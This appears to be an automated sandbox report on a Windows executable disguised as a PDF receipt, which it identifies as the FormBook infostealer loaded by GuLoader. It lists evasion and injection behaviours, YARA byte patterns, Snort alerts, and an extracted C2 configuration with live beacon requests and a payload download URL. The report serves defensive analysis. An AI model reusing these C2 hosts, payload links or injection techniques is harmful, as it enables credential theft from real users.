Edit tour

Windows Analysis Report
E-DEKONT_pdf.exe

Overview

General Information

Sample Name:	E-DEKONT_pdf.exe
Analysis ID:	835522
MD5:	fe8637b7f28206897219305735fdc407
SHA1:	9aaa5209476907a311d9905ab0566aadd833be3b
SHA256:	28384833cb4f57932b5344a38245cc995941d7fcccc387a2ffa7f295c91108ac
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to detect Any.run

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

E-DEKONT_pdf.exe (PID: 10064 cmdline: C:\Users\user\Desktop\E-DEKONT_pdf.exe MD5: FE8637B7F28206897219305735FDC407)

E-DEKONT_pdf.exe (PID: 1508 cmdline: C:\Users\user\Desktop\E-DEKONT_pdf.exe MD5: FE8637B7F28206897219305735FDC407)

explorer.exe (PID: 4836 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

colorcpl.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cmd.exe (PID: 5984 cmdline: /c del "C:\Users\user\Desktop\E-DEKONT_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.7578827334.000000000B463000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb52:$a2: pass 0xb58:$a3: email 0xb5f:$a4: login 0xb66:$a5: signin 0xb77:$a6: persistent 0xd4a:$r1: C:\Users\user\AppData\Roaming\60PBO7E5\60Plog.ini
00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.3225941650.00000000009EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.3227448221.0000000004D35000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: E-DEKONT_pdf.exe PID: 1508	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x53730:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 19 entries

Snort Signatures

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 34.138.169.8

Timestamp:	192.168.11.2034.138.169.849839802018752 03/27/23-13:05:11.349329
SID:	2018752
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249844802031412 03/27/23-13:06:36.076588
SID:	2031412
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 64.190.63.111

Timestamp:	192.168.11.2064.190.63.11149868802031449 03/27/23-13:12:26.472982
SID:	2031449
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249844802031453 03/27/23-13:06:36.076588
SID:	2031453
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 64.190.63.111

Timestamp:	192.168.11.2064.190.63.11149868802031453 03/27/23-13:12:26.472982
SID:	2031453
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249844802031449 03/27/23-13:06:36.076588
SID:	2031449
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 64.190.63.111

Timestamp:	192.168.11.2064.190.63.11149868802031412 03/27/23-13:12:26.472982
SID:	2031412
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: E-DEKONT_pdf.exe	ReversingLabs: Detection: 21%
Source: E-DEKONT_pdf.exe	Virustotal: Detection: 23%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	Avira URL Cloud: Label: malware
Source: http://www.anotherworldrecord.com/mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: E-DEKONT_pdf.exe

Joe Sandbox ML: detected

Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Source: E-DEKONT_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Andetkamres

Jump to behavior

Source: E-DEKONT_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: E-DEKONT_pdf.exe, 00000001.00000003.3254319112.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000002.3255957507.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000003.3253725384.00000000072E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: colorcpl.pdb source: E-DEKONT_pdf.exe, 00000001.00000003.3254319112.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000002.3255957507.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000003.3253725384.00000000072E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: MapiProxy.pdb@ source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: wntdll.pdbUGP source: E-DEKONT_pdf.exe, 00000001.00000003.3166244281.0000000037382000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: E-DEKONT_pdf.exe, 00000001.00000003.3166244281.0000000037382000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe
Source:	Binary string: mshtml.pdbUGP source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Code function: 0_2_004059F6 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004059F6
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Code function: 0_2_004065AB FindFirstFileA,FindClose,		0_2_004065AB

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 4x nop then pop ebx

3_2_00147B20

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 122.201.64.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.179.237.158 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.63.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.121.87.199 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.181.243 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 112.196.98.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 202.95.14.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.27.72.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49839 -> 34.138.169.8:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49868 -> 64.190.63.111:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49868 -> 64.190.63.111:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49868 -> 64.190.63.111:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crosswalkconsulting.co.uk/mi94/

Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU

Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=Omatd+gu8nRqk8Gn1x/OOoOdl/68z9YaBlXV3mZwE7pdVLuvsR/X9VlgKTB3ZiBvgeg4&G6GdR=axl0 HTTP/1.1Host: www.goodlifeprojectofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0 HTTP/1.1Host: www.anotherworldrecord.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&G6GdR=axl0 HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0 HTTP/1.1Host: www.funtime28.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2&G6GdR=axl0 HTTP/1.1Host: www.couragetokingdom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA&G6GdR=axl0 HTTP/1.1Host: www.peterslawonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0 HTTP/1.1Host: www.bestpetfinds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&G6GdR=axl0 HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
